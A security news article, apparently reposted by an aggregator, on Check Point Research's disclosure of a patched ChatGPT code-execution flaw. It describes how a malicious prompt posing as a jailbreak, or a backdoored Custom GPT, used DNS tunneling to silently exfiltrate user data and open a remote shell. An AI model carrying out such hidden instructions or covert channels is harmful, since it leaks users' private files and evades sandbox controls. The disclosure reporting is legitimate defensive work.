ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data

ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data
ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data
A critical vulnerability discovered in ChatGPT’s code execution environment allowed threat actors to silently exfiltrate user prompts, uploaded files, and other sensitive data through a hidden outbound channel all without triggering any visible security warnings to the user.

How the Vulnerability Worked

Researchers at Check Point Research uncovered the flaw in ChatGPT’s Python-based Data Analysis Linux runtime environment.

While OpenAI heavily restricts standard outbound internet traffic, including HTTP and TCP requests, the containerized runtime still permits Domain Name System (DNS) resolution to function normally.

Attackers exploited this gap through a technique called DNS tunneling, where sensitive data fragments are encoded and appended as subdomains to attacker-controlled domains.

Because DNS queries are treated as routine infrastructure traffic rather than data transfers, the system never triggered outbound data warnings for users.

Threat actors could exploit this vulnerability through two distinct vectors. In the first method, a malicious prompt was distributed online, disguised as a “jailbreak” or a productivity trick, and once pasted into a chat session, it immediately weaponized the conversation.

In the second method, attackers embedded malicious logic directly into a backdoored Custom GPT.

Any user who shared data with that custom assistant would be instantly compromised, without requiring any additional prompt injection.

The severity extended well beyond passive data exfiltration. Because the DNS channel was bidirectional, attackers could encode command fragments within DNS responses sent back to the container.

This effectively established a remote shell inside ChatGPT’s Linux container, enabling threat actors to execute arbitrary commands entirely outside the model’s standard safety mechanisms including accessing any medical records, financial data, or files processed during the session.

DetailInformation
Target PlatformChatGPT Code Execution & Data Analysis Linux Runtime
Attack VectorMalicious prompts or backdoored Custom GPTs
Exploit TechniqueDNS Tunneling via encoded subdomain labels
ImpactSilent data exfiltration and remote shell access
Patch DateFebruary 20, 2026

OpenAI successfully patched the vulnerability on February 20, 2026, following responsible disclosure by Check Point Research.

This incident signals a critical shift in AI security: as large language models evolve into full code execution environments capable of processing sensitive personal, medical, and financial data, securing all communication layers, including foundational infrastructure protocols like DNS, becomes non-negotiable.

Platform providers must ensure that no infrastructure-level channel can be weaponized to bypass application-layer data protections.

Follow us on Google News , LinkedIn and X to Get More Instant UpdatesSet Cyberpress as a Preferred Source in Google

The post ChatGPT Vulnerability Allows Silent Exfiltration of User Prompts and Sensitive Data appeared first on Cyber Security News.


Discover more from RSS Feeds Cloud

Subscribe to get the latest posts sent to your email.

Leave a Reply

Your email address will not be published. Required fields are marked *

Discover more from RSS Feeds Cloud

Subscribe now to keep reading and get access to the full archive.

Continue reading